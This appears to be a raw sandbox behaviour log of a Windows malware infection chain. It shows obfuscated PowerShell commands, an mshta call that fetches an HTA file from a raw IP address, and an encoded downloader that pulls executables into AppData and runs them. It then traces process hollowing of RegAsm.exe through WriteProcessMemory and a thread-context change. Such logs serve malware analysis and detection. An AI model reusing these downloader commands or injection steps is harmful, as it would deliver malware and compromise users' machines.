command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $g='s:aLh43vArH20fMw6p917T/5.t'; &(-join($g[(996-996),(689-687),(-418+421)])) ~= (-join($g[(996-996),(689-687),(-418+421)])); ~= ^[ (-join($g[(294-280),(996-996),(725-721),(507-486),(689-687)])); foreach($n in @((386-382),(-941+966),(-367+392),(-106+123),(182-181),(979-957),(-369+391),(219-201),(-305+310),(-665+689),(-104+123),(-842+865),(-848+853),(792-768),(-440+459),(894-874),(407-396),(223-199),(-875+894),(575-559),(999-983),(217-195),(889-880),(-550+565),(220-211),(363-356),(716-694),(975-969),(-94+106),(-924+936),(699-679),(-806+819),(785-761),(-599+603),(1005-980),(-774+776))){$O+=$g[$n]}; ^[ $O;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000033c
1 1 0

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

thread_handle: 0x000002d0
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

thread_handle: 0x00000324
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

thread_handle: 0x00000484
suspend_count: 1
process_identifier: 2672
1 0 0

CreateProcessInternalW

thread_identifier: 2812
thread_handle: 0x00000488
process_identifier: 2808
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000048c
1 1 0

NtResumeThread

thread_handle: 0x000004d0
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2808
1 0 0

CreateProcessInternalW

thread_identifier: 2952
thread_handle: 0x00000484
process_identifier: 2948
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000488
1 1 0

NtResumeThread

thread_handle: 0x00000470
suspend_count: 1
process_identifier: 2808
1 0 0

NtResumeThread

thread_handle: 0x00000298
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

thread_handle: 0x00000580
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

thread_handle: 0x00000388
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

thread_handle: 0x00000394
suspend_count: 1
process_identifier: 2948
1 0 0

CreateProcessInternalW

thread_identifier: 812
thread_handle: 0x000007b4
process_identifier: 604
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\23.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\23.exe"
filepath_r: C:\Users\test22\AppData\Roaming\23.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007b8
1 1 0

NtResumeThread

thread_handle: 0x000007cc
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

thread_handle: 0x00000134
suspend_count: 1
process_identifier: 604
1 0 0

CreateProcessInternalW

thread_identifier: 2108
thread_handle: 0x000000fc
process_identifier: 2116
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000170
1 1 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 7405568
process_identifier: 2116
process_handle: 0x00000170
3221225497 0

NtAllocateVirtualMemory

process_identifier: 2116
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000170
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰'rà 0„v. À@ @…$.OÀ\à .  H.text€‚ „ `.rsrc\À†@@.reloc àŒ@B
base_address: 0x00400000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€\ÀÌÌ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.04 InternalNameMseoc.exe&LegalCopyright*LegalTrademarks< OriginalFilenameMseoc.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0lÃê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0044c000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer: x>
base_address: 0x0044e000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

NtGetContextThread

thread_handle: 0x000000fc
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2116
process_handle: 0x00000170
1 1 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3406996
registers.edi: 0
registers.eax: 4206198
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000fc
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x00000178
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x000001ec
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x00000228
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x0000057c
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x00000590
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x00000310
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x00000314
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x000005d0
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x000005d8
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x000005ec
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x000005fc
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

thread_handle: 0x00000614
suspend_count: 1
process_identifier: 2116
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\mshta.exe
file C:\Users\test22\AppData\Roaming\23.exe